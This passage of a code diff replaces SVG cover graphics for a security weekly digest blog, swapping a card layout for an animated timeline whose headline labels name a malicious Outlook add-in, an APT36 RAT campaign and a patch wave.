14h1v1h-1zM6 14h3v1h-3zM13 14h1v1h-1zM15 14h3v1h-3zM21 14h1v1h-1zM25 14h1v1h-1zM29 14h1v1h-1zM31 14h2v1h-2zM34 14h3v1h-3zM38 14h3v1h-3zM0 15h1v1h-1zM2 15h2v1h-2zM5 15h1v1h-1zM7 15h3v1h-3zM12 15h3v1h-3zM16 15h1v1h-1zM18 15h5v1h-5zM24 15h1v1h-1zM26 15h1v1h-1zM28 15h1v1h-1zM32 15h1v1h-1zM34 15h1v1h-1zM36 15h2v1h-2zM1 16h1v1h-1zM3 16h4v1h-4zM10 16h2v1h-2zM16 16h1v1h-1zM18 16h2v1h-2zM22 16h1v1h-1zM24 16h2v1h-2zM27 16h1v1h-1zM30 16h3v1h-3zM36 16h2v1h-2zM39 16h1v1h-1zM0 17h1v1h-1zM3 17h2v1h-2zM8 17h2v1h-2zM12 17h1v1h-1zM14 17h1v1h-1zM16 17h2v1h-2zM20 17h1v1h-1zM23 17h3v1h-3zM32 17h2v1h-2zM35 17h1v1h-1zM37 17h1v1h-1zM0 18h2v1h-2zM3 18h1v1h-1zM5 18h3v1h-3zM11 18h1v1h-1zM13 18h1v1h-1zM15 18h3v1h-3zM20 18h2v1h-2zM27 18h2v1h-2zM30 18h1v1h-1zM32 18h1v1h-1zM36 18h1v1h-1zM38 18h2v1h-2zM0 19h1v1h-1zM2 19h4v1h-4zM7 19h3v1h-3zM11 19h3v1h-3zM16 19h1v1h-1zM19 19h2v1h-2zM22 19h1v1h-1zM27 19h4v1h-4zM35 19h1v1h-1zM37 19h3v1h-3zM0 20h1v1h-1zM4 20h1v1h-1zM6 20h1v1h-1zM10 20h2v1h-2zM13 20h1v1h-1zM15 20h2v1h-2zM18 20h3v1h-3zM26 20h2v1h-2zM29 20h6v1h-6zM36 20h4v1h-4zM0 21h1v1h-1zM2 21h1v1h-1zM7 21h2v1h-2zM11 21h6v1h-6zM18 21h1v1h-1zM20 21h2v1h-2zM23 21h2v1h-2zM26 21h1v1h-1zM31 21h1v1h-1zM34 21h7v1h-7zM1 22h12v1h-12zM14 22h1v1h-1zM16 22h1v1h-1zM20 22h1v1h-1zM23 22h2v1h-2zM28 22h3v1h-3zM33 22h2v1h-2zM37 22h1v1h-1zM39 22h1v1h-1zM1 23h1v1h-1zM4 23h1v1h-1zM7 23h4v1h-4zM13 23h2v1h-2zM16 23h1v1h-1zM18 23h2v1h-2zM25 23h1v1h-1zM27 23h1v1h-1zM30 23h1v1h-1zM32 23h2v1h-2zM0 24h1v1h-1zM2 24h1v1h-1zM4 24h1v1h-1zM6 24h3v1h-3zM11 24h1v1h-1zM17 24h1v1h-1zM19 24h1v1h-1zM22 24h1v1h-1zM24 24h3v1h-3zM29 24h1v1h-1zM31 24h1v1h-1zM35 24h1v1h-1zM37 24h1v1h-1zM0 25h1v1h-1zM8 25h1v1h-1zM11 25h1v1h-1zM14 25h2v1h-2zM17 25h1v1h-1zM19 25h1v1h-1zM24 25h2v1h-2zM27 25h1v1h-1zM29 25h1v1h-1zM31 25h3v1h-3zM37 25h4v1h-4zM0 26h1v1h-1zM3 26h4v1h-4zM8 26h3v1h-3zM12 26h2v1h-2zM15 26h2v1h-2zM18 26h3v1h-3zM24 26h1v1h-1zM26 26h1v1h-1zM28 26h2v1h-2zM31 26h2v1h-2zM34 26h1v1h-1zM37 26h1v1h-1zM39 26h2v1h-2zM3 27h3v1h-3zM8 27h5v1h-5zM19 27h5v1h-5zM26 27h2v1h-2zM30 27h3v1h-3zM34 27h4v1h-4zM39 27h1v1h-1zM0 28h2v1h-2zM4 28h1v1h-1zM6 28h2v1h-2zM11 28h1v1h-1zM13 28h1v1h-1zM16 28h1v1h-1zM18 28h5v1h-5zM25 28h4v1h-4zM31 28h3v1h-3zM36 28h2v1h-2zM39 28h1v1h-1zM1 29h2v1h-2zM4 29h2v1h-2zM8 29h1v1h-1zM11 29h2v1h-2zM14 29h1v1h-1zM16 29h2v1h-2zM19 29h1v1h-1zM22 29h5v1h-5zM29 29h2v1h-2zM32 29h1v1h-1zM35 29h1v1h-1zM37 29h1v1h-1zM39 29h1v1h-1zM0 30h1v1h-1zM2 30h2v1h-2zM6 30h3v1h-3zM11 30h2v1h-2zM16 30h1v1h-1zM18 30h1v1h-1zM20 30h1v1h-1zM25 30h4v1h-4zM32 30h4v1h-4zM5 31h1v1h-1zM7 31h2v1h-2zM15 31h1v1h-1zM17 31h3v1h-3zM22 31h1v1h-1zM28 31h2v1h-2zM31 31h1v1h-1zM34 31h1v1h-1zM36 31h5v1h-5zM1 32h1v1h-1zM6 32h1v1h-1zM8 32h4v1h-4zM13 32h1v1h-1zM16 32h3v1h-3zM21 32h1v1h-1zM24 32h1v1h-1zM26 32h1v1h-1zM29 32h2v1h-2zM32 32h7v1h-7zM40 32h1v1h-1zM8 33h2v1h-2zM11 33h1v1h-1zM14 33h1v1h-1zM19 33h2v1h-2zM23 33h1v1h-1zM27 33h2v1h-2zM32 33h1v1h-1zM36 33h1v1h-1zM38 33h3v1h-3zM0 34h7v1h-7zM8 34h3v1h-3zM13 34h2v1h-2zM17 34h1v1h-1zM23 34h2v1h-2zM28 34h1v1h-1zM31 34h2v1h-2zM34 34h1v1h-1zM36 34h4v1h-4zM0 35h1v1h-1zM6 35h1v1h-1zM8 35h1v1h-1zM10 35h1v1h-1zM12 35h2v1h-2zM16 35h1v1h-1zM18 35h3v1h-3zM24 35h2v1h-2zM28 35h1v1h-1zM32 35h1v1h-1zM36 35h1v1h-1zM39 35h1v1h-1zM0 36h1v1h-1zM2 36h3v1h-3zM6 36h1v1h-1zM9 36h3v1h-3zM14 36h3v1h-3zM18 36h1v1h-1zM25 36h2v1h-2zM29 36h1v1h-1zM32 36h7v1h-7zM40 36h1v1h-1zM0 37h1v1h-1zM2 37h3v1h-3zM6 37h1v1h-1zM8 37h3v1h-3zM12 37h1v1h-1zM17 37h3v1h-3zM26 37h2v1h-2zM29 37h1v1h-1zM31 37h1v1h-1zM36 37h1v1h-1zM38 37h1v1h-1zM40 37h1v1h-1zM0 38h1v1h-1zM2 38h3v1h-3zM6 38h1v1h-1zM8 38h2v1h-2zM12 38h4v1h-4zM18 38h4v1h-4zM24 38h1v1h-1zM26 38h1v1h-1zM28 38h2v1h-2zM35 38h1v1h-1zM37 38h4v1h-4zM0 39h1v1h-1zM6 39h1v1h-1zM9 39h3v1h-3zM13 39h1v1h-1zM15 39h3v1h-3zM19 39h1v1h-1zM21 39h2v1h-2zM24 39h1v1h-1zM26 39h1v1h-1zM28 39h1v1h-1zM32 39h2v1h-2zM36 39h2v1h-2zM39 39h1v1h-1zM0 40h7v1h-7zM8 40h1v1h-1zM17 40h1v1h-1zM20 40h4v1h-4zM25 40h1v1h-1zM30 40h1v1h-1zM32 40h3v1h-3zM39 40h1v1h-1z"/>
   </g>
-
-  <!-- Glow orbs -->
-  <circle cx="200" cy="300" r="200" fill="#ef4444" opacity="0.06" filter="url(#glow)"/>
-  <circle cx="600" cy="350" r="180" fill="#f59e0b" opacity="0.05" filter="url(#glow)"/>
-  <circle cx="1000" cy="300" r="180" fill="#3b82f6" opacity="0.06" filter="url(#glow)"/>
-
-  <!-- Header -->
-  <rect x="0" y="0" width="1200" height="80" fill="url(#hg)" opacity="0.9"/>
-  <rect x="0" y="78" width="1200" height="2" fill="#334155" opacity="0.8"/>
-  <g transform="translate(48,40)">
-    <path d="M0,-22 L18,-12 L18,3 C18,13 10,20 0,24 C-10,20 -18,13 -18,3 L-18,-12 Z" fill="#1e3a5f" stroke="#3b82f6" stroke-width="1.5"/>
-    <path d="M-7,1 L-2,6 L8,-5" stroke="#3b82f6" stroke-width="2.5" fill="none" stroke-linecap="round"/>
-  </g>
-  <text x="80" y="44" font-family="Arial,sans-serif" font-size="28" font-weight="700" fill="#f1f5f9">Security Weekly Digest</text>
-  <rect x="990" y="18" width="178" height="44" rx="6" fill="#1e293b" stroke="#334155" stroke-width="1"/>
-  <text x="1079" y="48" font-family="Arial,sans-serif" font-size="15" font-weight="700" fill="#94a3b8" text-anchor="middle">February 11, 2026</text>
-
-  <!-- Card 1: AI AGENT -->
-  <rect x="32" y="100" width="220" height="120" rx="8" fill="#1a0505" stroke="#ef4444" stroke-width="1.5"/>
-  <circle cx="52" cy="120" r="6" fill="#ef4444"/>
-  <g transform="translate(142,148)">
-    <circle cx="-12" cy="-8" r="4" fill="none" stroke="#ef4444" stroke-width="1.5"/><circle cx="12" cy="-8" r="4" fill="none" stroke="#ef4444" stroke-width="1.5"/><circle cx="0" cy="8" r="5" fill="none" stroke="#ef4444" stroke-width="1.8"/><line x1="-8" y1="-6" x2="-2" y2="6" stroke="#ef4444" stroke-width="1.2" opacity="0.7"/><line x1="8" y1="-6" x2="2" y2="6" stroke="#ef4444" stroke-width="1.2" opacity="0.7"/><line x1="-8" y1="-8" x2="8" y2="-8" stroke="#ef4444" stroke-width="1.2" opacity="0.5"/>
-  </g>
-  <text x="142" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#ef4444" text-anchor="middle">AI AGENT</text>
-  <!-- Card 2: SEC OPS -->
-  <rect x="268" y="100" width="220" height="120" rx="8" fill="#1a0d0d" stroke="#f59e0b" stroke-width="1.5"/>
-  <circle cx="288" cy="120" r="6" fill="#f59e0b"/>
-  <g transform="translate(378,148)">
-    <path d="M0,-16 L14,-8 L14,4 C14,12 8,16 0,20 C-8,16 -14,12 -14,4 L-14,-8 Z" fill="none" stroke="#f59e0b" stroke-width="1.8"/>
-  </g>
-  <text x="378" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#f59e0b" text-anchor="middle">SEC OPS</text>
-  <!-- Card 3: CLOUD SEC -->
-  <rect x="504" y="100" width="220" height="120" rx="8" fill="#0a1020" stroke="#3b82f6" stroke-width="1.5"/>
-  <circle cx="524" cy="120" r="6" fill="#3b82f6"/>
-  <g transform="translate(614,148)">
-    <path d="M-16,8 C-24,8 -26,-2 -20,-8 C-18,-18 -6,-22 4,-18 C8,-26 20,-26 24,-16 C30,-16 32,-8 28,0 C26,8 16,8 8,8 Z" fill="none" stroke="#3b82f6" stroke-width="1.8" transform="scale(0.65)"/>
-  </g>
-  <text x="614" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#3b82f6" text-anchor="middle">CLOUD SEC</text>
-  <!-- Card 4: THREAT INT -->
-  <rect x="740" y="100" width="200" height="120" rx="8" fill="#071a10" stroke="#22c55e" stroke-width="1.5"/>
-  <circle cx="760" cy="120" r="6" fill="#22c55e"/>
-  <g transform="translate(840,148)">
-    <path d="M0,-16 L14,-8 L14,4 C14,12 8,16 0,20 C-8,16 -14,12 -14,4 L-14,-8 Z" fill="none" stroke="#22c55e" stroke-width="1.8"/>
-  </g>
-  <text x="840" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#22c55e" text-anchor="middle">THREAT INT</text>
-  <!-- Card 5: PATCH MGT -->
-  <rect x="956" y="100" width="212" height="120" rx="8" fill="#071a20" stroke="#22d3ee" stroke-width="1.5"/>
-  <circle cx="976" cy="120" r="6" fill="#22d3ee"/>
-  <g transform="translate(1062,148)">
-    <path d="M0,-18 L16,12 L-16,12 Z" fill="none" stroke="#22d3ee" stroke-width="1.8"/><text x="0" y="6" font-family="Courier New" font-size="9" font-weight="700" fill="#22d3ee" text-anchor="middle">CVE</text>
-  </g>
-  <text x="1062" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#22d3ee" text-anchor="middle">PATCH MGT</text>
-
-  <!-- Threat map area -->
-  <rect x="32" y="240" width="1136" height="220" rx="10" fill="#0c1220" stroke="#1e293b" stroke-width="1"/>
-
-  <!-- Ambient dots -->
-  <g opacity="0.25">
-    <circle cx="180" cy="330" r="2" fill="#94a3b8"/><circle cx="200" cy="340" r="2" fill="#94a3b8"/>
-    <circle cx="550" cy="310" r="2" fill="#94a3b8"/><circle cx="570" cy="325" r="2" fill="#94a3b8"/>
-    <circle cx="750" cy="320" r="2" fill="#94a3b8"/><circle cx="900" cy="330" r="2" fill="#94a3b8"/>
-    <circle cx="350" cy="350" r="2" fill="#94a3b8"/><circle cx="1000" cy="340" r="2" fill="#94a3b8"/>
-  </g>
-  <!-- Node: AI AGENT -->
-  <circle cx="170" cy="340" r="22" fill="#1a0505" stroke="#ef4444" stroke-width="2"/>
-  <text x="170" y="344" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#ef4444" text-anchor="middle">AI</text>
-  <!-- Node: SEC OPS -->
-  <circle cx="370" cy="350" r="20" fill="#1a0d0d" stroke="#f59e0b" stroke-width="2"/>
-  <text x="370" y="354" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#f59e0b" text-anchor="middle">SEC</text>
-  <!-- Node: CLOUD SEC -->
-  <circle cx="580" cy="330" r="22" fill="#0a1020" stroke="#3b82f6" stroke-width="2"/>
-  <text x="580" y="334" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#3b82f6" text-anchor="middle">CLOU</text>
-  <!-- Node: THREAT INT -->
-  <circle cx="780" cy="355" r="18" fill="#071a10" stroke="#22c55e" stroke-width="2"/>
-  <text x="780" y="359" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#22c55e" text-anchor="middle">THRE</text>
-  <!-- Node: PATCH MGT -->
-  <circle cx="980" cy="340" r="22" fill="#071a20" stroke="#22d3ee" stroke-width="2"/>
-  <text x="980" y="344" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#22d3ee" text-anchor="middle">PATC</text>
-  <line x1="192" y1="340" x2="350" y2="350" stroke="#ef4444" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="390" y1="350" x2="558" y2="330" stroke="#f59e0b" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="602" y1="330" x2="762" y2="355" stroke="#3b82f6" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="798" y1="355" x2="958" y2="340" stroke="#22c55e" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-
-  <!-- Footer -->
-  <rect x="0" y="472" width="1200" height="158" fill="#080c18" opacity="0.95"/>
-  <rect x="0" y="472" width="1200" height="2" fill="#1e293b"/>
-
-  <!-- Tags -->
-  <rect x="32" y="490" width="92" height="24" rx="4" fill="#1a0505" stroke="#ef4444" stroke-width="1"/>
-  <text x="78" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#ef4444" text-anchor="middle">AI AGENT</text>
-  <rect x="136" y="490" width="83" height="24" rx="4" fill="#1a0d0d" stroke="#f59e0b" stroke-width="1"/>
-  <text x="177" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#f59e0b" text-anchor="middle">SEC OPS</text>
-  <rect x="231" y="490" width="101" height="24" rx="4" fill="#0a1020" stroke="#3b82f6" stroke-width="1"/>
-  <text x="281" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#3b82f6" text-anchor="middle">CLOUD SEC</text>
-  <rect x="344" y="490" width="110" height="24" rx="4" fill="#071a10" stroke="#22c55e" stroke-width="1"/>
-  <text x="399" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#22c55e" text-anchor="middle">THREAT INT</text>
-  <rect x="466" y="490" width="101" height="24" rx="4" fill="#071a20" stroke="#22d3ee" stroke-width="1"/>
-  <text x="516" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#22d3ee" text-anchor="middle">PATCH MGT</text>
-
-  <!-- Bottom bar -->
-  <circle cx="32" cy="545" r="4" fill="#ef4444" opacity="0.6"/>
-  <text x="46" y="550" font-family="Arial,sans-serif" font-size="12" fill="#475569">Security Weekly Digest | February 11, 2026</text>
-  <text x="1168" y="550" font-family="Arial,sans-serif" font-size="12" fill="#475569" text-anchor="end">tech.2twodragon.com</text>
+</g>
+<text x="1122" y="614" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="700" fill="#F5F7FA" text-anchor="middle">scan / full post</text>
 </svg>

--- a/assets/images/2026-02-12-Tech_Security_Weekly_Digest_AI_Cloud_Security_Agent.svg
+++ b/assets/images/2026-02-12-Tech_Security_Weekly_Digest_AI_Cloud_Security_Agent.svg
@@ -1,134 +1,369 @@
-<svg xmlns="http://www.w3.org/2000/svg" width="1200" height="630" viewBox="0 0 1200 630">
-  <title>Security Weekly Digest - February 12, 2026</title>
-  <defs>
-    <linearGradient id="bg" x1="0%" y1="0%" x2="100%" y2="100%">
-      <stop offset="0%" stop-color="#0a0e1a"/>
-      <stop offset="60%" stop-color="#0f1628"/>
-      <stop offset="100%" stop-color="#141b2d"/>
-    </linearGradient>
-    <linearGradient id="hg" x1="0%" y1="0%" x2="100%" y2="0%">
-      <stop offset="0%" stop-color="#1e293b"/>
-      <stop offset="100%" stop-color="#0f172a"/>
-    </linearGradient>
-    <filter id="glow" x="-50%" y="-50%" width="200%" height="200%">
-      <feGaussianBlur stdDeviation="18"/>
-    </filter>
-    <marker id="ar" markerWidth="8" markerHeight="8" refX="4" refY="4" orient="auto">
-      <path d="M0,0 L8,4 L0,8 Z" fill="#ef4444" opacity="0.7"/>
-    </marker>
-  </defs>
+<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1200 630" width="1200" height="630" role="img" aria-label="Research-based weekly digest cover: Malicious Outlook add-in steals 4000+ credentials, APT36 SideCopy cross-platform RAT targets India govt, 60-vendor OS security patch wave">
+<!-- profile: high-quality-cover (L14 Timeline, research-based, batch1-locked) -->
+<title>Weekly digest 2026-02-12 timeline: Outlook add-in credential theft (Feb 07), APT36 SideCopy RAT campaign (Feb 09), 60-vendor security patch wave (Feb 12)</title>
+<defs>
+  <linearGradient id="bgSpread" x1="0%" y1="0%" x2="100%" y2="100%">
+    <stop offset="0%" stop-color="#0A1226"/>
+    <stop offset="55%" stop-color="#0D1530"/>
+    <stop offset="100%" stop-color="#131038"/>
+  </linearGradient>
+  <linearGradient id="colA" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#122542"/>
+    <stop offset="100%" stop-color="#0A1830"/>
+  </linearGradient>
+  <linearGradient id="colB" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#2E1A0A"/>
+    <stop offset="100%" stop-color="#1E1006"/>
+  </linearGradient>
+  <linearGradient id="colC" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#2E1016"/>
+    <stop offset="100%" stop-color="#1E0A12"/>
+  </linearGradient>
+  <linearGradient id="timelineGrad" x1="0%" y1="0%" x2="100%" y2="0%">
+    <stop offset="0%" stop-color="#4ADE80" stop-opacity="0.2"/>
+    <stop offset="35%" stop-color="#3A86FF" stop-opacity="0.9"/>
+    <stop offset="65%" stop-color="#FFB703" stop-opacity="0.9"/>
+    <stop offset="100%" stop-color="#E63946"/>
+  </linearGradient>
+  <radialGradient id="glowBlue" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#3A86FF" stop-opacity="0.6"/>
+    <stop offset="100%" stop-color="#3A86FF" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="glowAmber" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#FFB703" stop-opacity="0.6"/>
+    <stop offset="100%" stop-color="#FFB703" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="glowRed" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#E63946" stop-opacity="0.65"/>
+    <stop offset="100%" stop-color="#E63946" stop-opacity="0"/>
+  </radialGradient>
+  <pattern id="dotGrid" x="0" y="0" width="40" height="40" patternUnits="userSpaceOnUse">
+    <circle cx="20" cy="20" r="0.8" fill="#2A3256" opacity="0.55"/>
+  </pattern>
+  <filter id="softShadow" x="-10%" y="-10%" width="130%" height="130%">
+    <feGaussianBlur in="SourceAlpha" stdDeviation="2.6"/>
+    <feOffset dx="1" dy="3"/>
+    <feComponentTransfer><feFuncA type="linear" slope="0.55"/></feComponentTransfer>
+    <feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge>
+  </filter>
+  <filter id="textShadow" x="-5%" y="-5%" width="110%" height="110%">
+    <feGaussianBlur in="SourceAlpha" stdDeviation="1.2"/>
+    <feOffset dx="0" dy="1.5"/>
+    <feComponentTransfer><feFuncA type="linear" slope="0.8"/></feComponentTransfer>
+    <feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge>
+  </filter>
+</defs>
 
-  <rect width="1200" height="630" fill="url(#bg)"/>
+<rect width="1200" height="630" fill="url(#bgSpread)"/>
+<rect width="1200" height="630" fill="url(#dotGrid)"/>
 
-  <!-- Grid -->
-  <g opacity="0.04" stroke="#94a3b8" stroke-width="0.5">
-    <line x1="0" y1="105" x2="1200" y2="105"/><line x1="0" y1="210" x2="1200" y2="210"/>
-    <line x1="0" y1="315" x2="1200" y2="315"/><line x1="0" y1="420" x2="1200" y2="420"/>
-    <line x1="0" y1="525" x2="1200" y2="525"/>
-    <line x1="240" y1="0" x2="240" y2="630"/><line x1="480" y1="0" x2="480" y2="630"/>
-    <line x1="720" y1="0" x2="720" y2="630"/><line x1="960" y1="0" x2="960" y2="630"/>
+<!-- Column glow halos -->
+<circle cx="240" cy="390" r="140" fill="url(#glowBlue)">
+  <animate attributeName="opacity" values="0.5;0.85;0.5" dur="6.4s" repeatCount="indefinite"/>
+</circle>
+<circle cx="620" cy="390" r="140" fill="url(#glowAmber)">
+  <animate attributeName="opacity" values="0.5;0.85;0.5" dur="5.6s" repeatCount="indefinite"/>
+</circle>
+<circle cx="1000" cy="390" r="140" fill="url(#glowRed)">
+  <animate attributeName="opacity" values="0.5;0.85;0.5" dur="7.0s" repeatCount="indefinite"/>
+</circle>
+
+<!-- Header bar -->
+<rect x="0" y="0" width="1200" height="56" fill="#050813" opacity="0.92"/>
+<text x="36" y="36" font-family="Inter, Helvetica, Arial, sans-serif" font-size="18" font-weight="700" fill="#8FB8FF" letter-spacing="2.5">WEEKLY DIGEST</text>
+<text x="1164" y="36" font-family="Inter, Helvetica, Arial, sans-serif" font-size="15" font-weight="600" fill="#7DA3D9" letter-spacing="1.5" text-anchor="end">2026.02.12</text>
+<rect x="0" y="54" width="1200" height="2" fill="#8FB8FF" opacity="0.85"/>
+
+<!-- Starfield dots (static) -->
+<g fill="#8FB8FF" opacity="0.5">
+  <circle cx="160" cy="78" r="1.2"/>
+  <circle cx="420" cy="86" r="1.0"/>
+  <circle cx="720" cy="80" r="1.3"/>
+  <circle cx="1040" cy="88" r="0.9"/>
+</g>
+
+<!-- Subtitle block -->
+<text x="60" y="96" font-family="Inter, Helvetica, Arial, sans-serif" font-size="13" font-weight="700" fill="#9FD3B0" letter-spacing="3">THIS WEEK  /  FEB 06 - 12</text>
+<text x="60" y="130" font-family="Inter, Helvetica, Arial, sans-serif" font-size="28" font-weight="800" fill="#F5F7FA" filter="url(#textShadow)">Three Threats Across Seven Days</text>
+
+<!-- Timeline axis at y=170 -->
+<line x1="60" y1="170" x2="1140" y2="170" stroke="url(#timelineGrad)" stroke-width="3.4" stroke-linecap="round"/>
+
+<!-- Moving traveler dot -->
+<circle r="5" fill="#F5F7FA" stroke="#8FB8FF" stroke-width="1.4">
+  <animate attributeName="cx" values="60;1140;60" dur="11s" repeatCount="indefinite"/>
+  <animate attributeName="opacity" values="0;1;1;1;0" dur="11s" repeatCount="indefinite"/>
+</circle>
+
+<!-- 7 date ticks: FEB 06 to FEB 12 -->
+<g font-family="Inter, monospace" font-size="10" font-weight="700" fill="#7DA3D9">
+  <line x1="80" y1="163" x2="80" y2="177" stroke="#4A6AA0" stroke-width="1.2"/>
+  <text x="80" y="194" text-anchor="middle">FEB 06</text>
+  <line x1="240" y1="163" x2="240" y2="177" stroke="#4A6AA0" stroke-width="1.2"/>
+  <text x="240" y="194" text-anchor="middle" fill="#8FB8FF">FEB 07</text>
+  <line x1="400" y1="163" x2="400" y2="177" stroke="#4A6AA0" stroke-width="1.2"/>
+  <text x="400" y="194" text-anchor="middle">FEB 08</text>
+  <line x1="600" y1="163" x2="600" y2="177" stroke="#4A6AA0" stroke-width="1.2"/>
+  <text x="600" y="194" text-anchor="middle" fill="#FFB703">FEB 09</text>
+  <line x1="760" y1="163" x2="760" y2="177" stroke="#4A6AA0" stroke-width="1.2"/>
+  <text x="760" y="194" text-anchor="middle">FEB 10</text>
+  <line x1="920" y1="163" x2="920" y2="177" stroke="#4A6AA0" stroke-width="1.2"/>
+  <text x="920" y="194" text-anchor="middle">FEB 11</text>
+  <line x1="1120" y1="163" x2="1120" y2="177" stroke="#4A6AA0" stroke-width="1.2"/>
+  <text x="1120" y="194" text-anchor="middle" fill="#F87171">FEB 12</text>
+</g>
+
+<!-- 3 anchor dots: FEB 07 (blue), FEB 09 (amber), FEB 12 (red) -->
+<g transform="translate(240,170)">
+  <circle r="22" fill="url(#glowBlue)">
+    <animate attributeName="r" values="20;32;20" dur="2.8s" repeatCount="indefinite"/>
+    <animate attributeName="opacity" values="0.6;1;0.6" dur="2.8s" repeatCount="indefinite"/>
+  </circle>
+  <circle r="10" fill="#0A1B2E" stroke="#3A86FF" stroke-width="3" filter="url(#softShadow)"/>
+  <circle r="3.5" fill="#8FB8FF">
+    <animate attributeName="opacity" values="1;0.3;1" dur="1.6s" repeatCount="indefinite"/>
+  </circle>
+</g>
+<g transform="translate(600,170)">
+  <circle r="22" fill="url(#glowAmber)">
+    <animate attributeName="r" values="20;32;20" dur="2.8s" begin="0.4s" repeatCount="indefinite"/>
+    <animate attributeName="opacity" values="0.6;1;0.6" dur="2.8s" begin="0.4s" repeatCount="indefinite"/>
+  </circle>
+  <circle r="10" fill="#1E1006" stroke="#FFB703" stroke-width="3" filter="url(#softShadow)"/>
+  <circle r="3.5" fill="#FFD58A">
+    <animate attributeName="opacity" values="1;0.3;1" dur="1.8s" repeatCount="indefinite"/>
+  </circle>
+</g>
+<g transform="translate(1120,170)">
+  <circle r="22" fill="url(#glowRed)">
+    <animate attributeName="r" values="20;32;20" dur="2.8s" begin="0.8s" repeatCount="indefinite"/>
+    <animate attributeName="opacity" values="0.6;1;0.6" dur="2.8s" begin="0.8s" repeatCount="indefinite"/>
+  </circle>
+  <circle r="10" fill="#1E0A14" stroke="#E63946" stroke-width="3" filter="url(#softShadow)"/>
+  <circle r="3.5" fill="#FCA5A5">
+    <animate attributeName="opacity" values="1;0.3;1" dur="1.7s" repeatCount="indefinite"/>
+  </circle>
+</g>
+
+<!-- Connector dashed lines anchor -> columns -->
+<line x1="240" y1="180" x2="240" y2="216" stroke="#3A86FF" stroke-width="1.4" stroke-dasharray="3 3" opacity="0.7"/>
+<line x1="600" y1="180" x2="600" y2="216" stroke="#FFB703" stroke-width="1.4" stroke-dasharray="3 3" opacity="0.7"/>
+<line x1="1120" y1="180" x2="988" y2="216" stroke="#E63946" stroke-width="1.4" stroke-dasharray="3 3" opacity="0.7"/>
+
+<!-- COL A: Malicious Outlook Add-in (Feb 07) blue -->
+<g transform="translate(72,216)">
+  <rect x="0" y="0" width="336" height="374" rx="14" fill="url(#colA)" stroke="#3A86FF" stroke-width="1.6" opacity="0.97"/>
+  <rect x="0" y="0" width="336" height="4" fill="#3A86FF" opacity="0.7"/>
+  <g filter="url(#textShadow)">
+    <text x="20" y="28" font-family="Inter, Helvetica, Arial, sans-serif" font-size="11" font-weight="700" fill="#8FB8FF" letter-spacing="2.4">CRITICAL  /  SUPPLY CHAIN</text>
+    <text x="20" y="54" font-family="Inter, Helvetica, Arial, sans-serif" font-size="20" font-weight="800" fill="#F5F7FA">Outlook Add-in Attack</text>
+    <text x="20" y="76" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="500" fill="#BFC9D9">4,000+ MS accounts harvested</text>
   </g>
-
-  <!-- Glow orbs -->
-  <circle cx="200" cy="300" r="200" fill="#ef4444" opacity="0.06" filter="url(#glow)"/>
-  <circle cx="600" cy="350" r="180" fill="#f59e0b" opacity="0.05" filter="url(#glow)"/>
-  <circle cx="1000" cy="300" r="180" fill="#3b82f6" opacity="0.06" filter="url(#glow)"/>
-
-  <!-- Header -->
-  <rect x="0" y="0" width="1200" height="80" fill="url(#hg)" opacity="0.9"/>
-  <rect x="0" y="78" width="1200" height="2" fill="#334155" opacity="0.8"/>
-  <g transform="translate(48,40)">
-    <path d="M0,-22 L18,-12 L18,3 C18,13 10,20 0,24 C-10,20 -18,13 -18,3 L-18,-12 Z" fill="#1e3a5f" stroke="#3b82f6" stroke-width="1.5"/>
-    <path d="M-7,1 L-2,6 L8,-5" stroke="#3b82f6" stroke-width="2.5" fill="none" stroke-linecap="round"/>
+  <!-- Scene: envelope with phish hook -->
+  <g transform="translate(168,138)">
+    <g filter="url(#softShadow)">
+      <rect x="-50" y="-26" width="100" height="64" rx="5" fill="#0A1B2E" stroke="#3A86FF" stroke-width="1.8"/>
+      <path d="M-50,-26 L0,10 L50,-26 Z" fill="#0F2440" stroke="#3A86FF" stroke-width="1.2"/>
+      <text x="0" y="32" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#8FB8FF">OUTLOOK</text>
+    </g>
+    <!-- Phish hook -->
+    <g stroke="#E63946" stroke-width="2.2" fill="none">
+      <path d="M0,40 Q0,58 16,58 Q32,58 32,44 Q32,34 20,34">
+        <animate attributeName="stroke-opacity" values="0.5;1;0.5" dur="2.0s" repeatCount="indefinite"/>
+      </path>
+      <line x1="20" y1="28" x2="20" y2="34"/>
+      <path d="M14,28 L20,22 L26,28" fill="#E63946" stroke="none"/>
+    </g>
